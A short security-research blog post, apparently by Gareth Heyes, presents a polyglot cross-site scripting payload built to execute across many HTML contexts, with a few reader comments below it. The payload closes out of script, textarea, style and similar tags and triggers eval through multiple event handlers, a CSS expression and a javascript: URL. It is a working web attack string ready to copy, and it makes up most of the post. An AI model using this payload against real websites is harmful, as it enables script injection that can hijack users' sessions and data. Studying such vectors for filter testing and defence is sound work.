One vector to rule them all

I set myself a fun challenge to create a vector that would execute in many contexts. The idea being that it should work regardless where it’s placed. For example:-

<tag alt="xss">

As an added challenge I tried to execute only the one payload and where possible to use a single eval. I had to use multiple evals as the contexts increased because for stuff like background= etc there was no way I could figure reusing the existing one πŸ™ So I had around 19 then got bored.

One vector to xss them all, one vector to find them,
One vector to bring them all and in the darkness bind them.

javascript:/*-->]]>%>?></script></title></textarea></noscript></style></xmp>">[img=1,name=/alert(1)/.source]<img -/style=a:expression&#40&#47&#42'/-/*&#39,/**/eval(name)/*%2A///*///&#41;;width:100%;height:100%;position:absolute;-ms-behavior:url(#default#time2) name=alert(1) onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=eval(name) onmouseover=eval(name) onbegin=eval(name) background=javascript:eval(name)//>"

Updated added new vectors and removed any that weren’t required. Thanks to @LeverOne!!

2nd Update…Fixed comments, added name to [] rule so it executes without for dom rules. Thanks again for some fixes by @LeverOne

4 Responses to “One vector to rule them all”

  1. Rodrigo writes:

    Lol do you know what happen when you try to stumble this article? xD

  2. Gareth Heyes writes:


    Hmmm I can only guess πŸ˜€

  3. .mario writes:

    @Rodrigo LOL – very nice πŸ˜€

  4. anonymous writes:

    just curious but you seem to have thought of a number of different contexts (and not just the simple 3 you wrote down) – do you mind enumerating what all you have thought of ?

    it seems ‘<noscript> xss </noscript>’ might be one , and there are more. it would help a noob a lot πŸ™‚